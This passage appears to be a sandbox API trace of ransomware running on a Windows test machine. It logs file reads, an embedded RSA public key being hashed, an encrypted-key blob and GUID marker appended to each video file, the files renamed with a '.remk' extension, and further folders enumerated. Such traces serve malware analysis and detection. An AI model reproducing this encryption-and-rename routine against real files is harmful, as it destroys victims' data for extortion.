Size=0x80) returned 0x694398 [0234.804] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0234.804] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694398 | out: hHeap=0x630000) returned 1 [0234.804] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\IBFomAmOPzHP.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\ibfomamopzhp.mp4"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\IBFomAmOPzHP.mp4.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\ibfomamopzhp.mp4.remk")) returned 1 [0234.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.806] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.807] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e730 | out: hHeap=0x630000) returned 1 [0234.807] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28584f10, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0x7dc60d60, ftLastAccessTime.dwHighDateTime=0x1d5da2e, ftLastWriteTime.dwLowDateTime=0x7dc60d60, ftLastWriteTime.dwHighDateTime=0x1d5da2e, nFileSizeHigh=0x0, nFileSizeLow=0x17f13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KpWw7pD9YBx.mkv", cAlternateFileName="KPWW7P~1.MKV")) returned 1 [0234.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x325e288 [0234.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8e) returned 0x65e730 [0234.808] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325e288 | out: hHeap=0x630000) returned 1 [0234.808] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\KpWw7pD9YBx.mkv") returned=".mkv" [0234.808] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\KpWw7pD9YBx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\kpww7pd9ybx.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.808] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=98067) returned 1 [0234.808] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.811] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17eed, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.811] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.813] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.813] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x17f13, lpOverlapped=0x0) returned 1 [0234.819] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x325fb40 [0234.820] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.820] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.820] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694398) returned 1 [0234.821] CryptCreateHash (in: hProv=0x694398, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.821] CryptHashData (hHash=0x31de170, pbData=0x325fb40, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.821] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.821] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.821] GetLastError () returned 0x0 [0234.821] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.821] CryptReleaseContext (hProv=0x694398, dwFlags=0x0) returned 1 [0234.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.821] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.821] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.821] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.821] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x17f10) returned 0x37c4278 [0234.823] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fd48 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c728 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8e0 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c770 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee8f8 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee928 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee940 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.824] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee940 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee928 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31a4298 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a4298 | out: hHeap=0x630000) returned 1 [0234.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee940 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee928 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.825] GetCurrentThreadId () returned 0x314 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31a4298 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3b50 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.826] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x17f13, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.826] WriteFile (in: hFile=0x640, lpBuffer=0x31a4298*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31a4298*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.827] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.827] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.827] CloseHandle (hObject=0x640) returned 1 [0234.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694398 [0234.842] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x890) returned 0x37b5b70 [0234.842] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\KpWw7pD9YBx.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\kpww7pd9ybx.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\KpWw7pD9YBx.mkv.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\kpww7pd9ybx.mkv.remk")) returned 1 [0234.850] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28584f10, ftCreationTime.dwHighDateTime=0x1d5dec4, ftLastAccessTime.dwLowDateTime=0x7dc60d60, ftLastAccessTime.dwHighDateTime=0x1d5da2e, ftLastWriteTime.dwLowDateTime=0x7dc60d60, ftLastWriteTime.dwHighDateTime=0x1d5da2e, nFileSizeHigh=0x0, nFileSizeLow=0x17f13, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KpWw7pD9YBx.mkv", cAlternateFileName="KPWW7P~1.MKV")) returned 0 [0234.850] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.850] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.851] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x70) returned 0x37ba9c0 [0234.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0234.851] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0234.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0234.851] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0234.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.851] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0234.851] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0234.851] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.851] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.851] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.851] PathFindFileNameW (pszPath="") returned="" [0234.851] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.865] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.865] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd6e27e0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd6e27e0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0234.865] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 1 [0234.866] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Linguistics", cAlternateFileName="LINGUI~1")) returned 0 [0234.866] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0234.866] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0234.866] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0234.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\") returned="Microsoft\\" [0234.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0234.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0234.866] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0234.867] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0234.867] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0234.867] PathFindFileNameW (pszPath="") returned="" [0234.867] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x23a43389, ftLastWriteTime.dwHighDateTime=0x1cb892f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="CryptnetUrlCache", cAlternateFileName="CRYPTN~1")) returned 1 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd708940, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd708940, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IMJP9_0", cAlternateFileName="")) returned 1 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x510b3550, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x5616fca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0234.869] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | 